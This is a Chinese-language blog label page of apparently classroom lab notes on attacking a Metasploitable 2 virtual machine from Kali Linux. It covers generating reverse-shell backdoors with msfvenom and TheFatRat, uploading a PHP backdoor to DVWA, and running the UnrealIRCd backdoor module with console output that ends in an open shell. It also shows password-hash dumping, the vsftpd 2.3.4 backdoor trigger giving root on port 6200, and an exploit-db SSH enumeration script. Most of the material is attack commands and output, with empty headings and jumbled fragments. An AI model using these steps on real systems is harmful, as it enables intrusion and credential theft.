Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts
Friday, February 3, 2023
Sunday, September 27, 2020
Monday, September 7, 2020
Saturday, September 5, 2020
Thursday, September 3, 2020
Encryption String
Tuesday, August 25, 2020
Monday, August 24, 2020
dirb
dirb http://192.168.92.129
+ http://192.168.92.129/phpMyAdmin/sql (CODE:200|SIZE:4145)
==> DIRECTORY: http://192.168.92.129/phpMyAdmin/test/
Sunday, August 23, 2020
Reverse shell 後門程式
選 1 -> 用msfvenom產生後門程式
產生後門程式 test.sh
注入後門程式
找尋可以執行程式的地方
1. 開機執行?
2. 執行某個程式的時候?
3. 執行某個功能的時候?
sudo msfconsole
使用模組:exploit/multi/handler
執行程式
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.92.128:1234
待受首者執行後門程式 (先用本機是否測試成功,另一台也要是 kali)
root@kali:~/Fatrat_Generated# ./test.sh
./test.sh: redirection error: cannot duplicate fd: Bad file descriptor
./test.sh: line 1: 154: Bad file descriptor
攻擊者成功建立Reverse shell
注入後門程式在 192.168.92.129
先產生 php 後門程式
port 9999
設定好後,產生 test.php
登入
http://192.168.92.129/dvwa/login.php (default username is 'admin' with password 'password')
將後門程式上傳
執行 http://192.168.92.129/dvwa/hackable/uploads/test.php
安裝 TheFatRat
安裝
sudo chmod +x setup.sh && sudo ./setup.sh
確認是否需要手動指定後門程式工具包
確認是否需要手動安裝缺少的套件
位置:/home/kali/Desktop/class2/practice-14/the-backdoor-factory/backdoor.py
cd TheFatRat
chmod +x chk_tools
./chk_tools
Instalation completed , To execute fatrat write anywhere in your terminal (fatrat)
root@kali:/home/kali/Desktop/class2/practice-14/TheFatRat# ./fatrat
TheFatRat功能介紹
• 01:用msfvenom產生後門程式
• 02:用Fudwin1.0產生後門程式
• 03:用Avoid v1.2產生後門程式
• 04:用backdoor-factory產生後門程式
• 05:產生apk後門程式
• 06:用PwnWinds產生後門程式
• 07:產生office相關後門程式
• 08:產生linux相關後門程式
對 Metasploitable 2 6667 進行攻擊
msf5 > db_nmap -sS -A 192.168.92.1/24
msf5 > search irc
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info
Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2010-06-12
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.92.129
RHOSTS => 192.168.92.129
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.92.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 192.168.92.128:4444
[*] 192.168.92.129:6667 - Connected to 192.168.92.129:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.92.129:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BCNTNmWzC7uENOcl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BCNTNmWzC7uENOcl\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.92.128:4444 -> 192.168.92.129:54096) at 2020-08-23 08:16:47 -0400
保留 session
ctrl +z
Background session 1? [y/N] y
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.92.128:4444 -> 192.168.92.129:54096 (192.168.92.129)
使用蒐集密碼檔案 post/linux/gather/hashdump
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > back
msf5 > use post/linux/gather/hashdump
用已建立的連線
建立連線至 metasploitable2,TCP 21 連接埠存在一個 CVE 漏洞
root@kali:/home/kali/Desktop/class2/practice-10# telnet 192.168.92.129 21
Trying 192.168.92.129...
Connected to 192.168.92.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user 1234:)
331 Please specify the password.
pass 12345
==============================================================
檢查是否有開啟 6200 port
kali@kali:~$ sudo nmap -sS -p 6200 192.168.92.129
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 07:22 EDT
Nmap scan report for 192.168.92.129
Host is up (0.00028s latency).
PORT STATE SERVICE
6200/tcp open lm-x
MAC Address: 00:0C:29:D9:F1:65 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
kali@kali:~$
===============================================================
透過 6200 port 進行登入
kali@kali:~$ telnet 192.168.92.129 6200
Trying 192.168.92.129...
Connected to 192.168.92.129.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found
找尋不安全的套件
揭露裝置套件版本
root@kali:/home/kali# nmap -sS -sV -p 22 192.168.92.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 05:35 EDT
Nmap scan report for 192.168.92.129
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
MAC Address: 00:0C:29:D9:F1:65 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds
搜尋是否使用不安全套件
https://www.cvedetails.com/cve/CVE-2018-15473/
下載公開漏洞工具進行攻擊
下載公開漏洞工具進行攻擊
https://www.exploit-db.com/exploits/45233
python 45233.py 192.168.92.129 -- port 22 -username root
python 45233.py 192.168.92.129 -- port 22 -username root2
載入新模組
root@kali:~/.msf4/modules# pwd
/root/.msf4/modules
root@kali:~/.msf4/modules# mkdir exploits
copy test_module.rb to exploits dir
root@kali:~/.msf4/modules/exploits# ls
test_module.rb
啟動 msfconsole
重新載入模組
reload_all
msf5 > reload_all
[*] Reloading modules from all module paths...
[!] The following modules were loaded with warnings:
[!] /root/.msf4/modules/exploits/test_module.rb
[!] Please see /root/.msf4/logs/framework.log for details.
Friday, August 21, 2020
利用 msf 工具進行漏洞攻擊
Kali Linux: 192.168.92.128
Metasploitable 2: 192.168.92.129
msf5 > search irc
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info //查看 module 資訊
Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2010-06-12
msf5 > options
開始入侵
已在 Metasploitable 2: 192.168.92.129
Tuesday, August 18, 2020
利用 msf 工具收集測試資料
Kali Linux: 192.168.92.128
Metasploitable 2: 192.168.92.129
執行啟動資料庫
systemctl start postgresql
重新初始化資料庫
sudo msfdb init
啟動 msfconsole,並儲存指令至 iotclass1
sudo msfconsole -H iotclass1
建立一個名為 lab 的工作區域
msf5 > workspace -a lab
[*] Added workspace: lab [*] Workspace: lab
查看工作區域
msf5 > workspace default * lab msf5 >
對區域網路的設備進行TCP SYN掃描(-sS)、識別服務類型與版本、識別作業系統類型與版本、使用Script掃描等上述掃描(-A)
msf5 > db_nmap -sS 192.168.92.1/24
msf5 > hosts
msf5> services
msf5> back
Subscribe to:
Posts (Atom)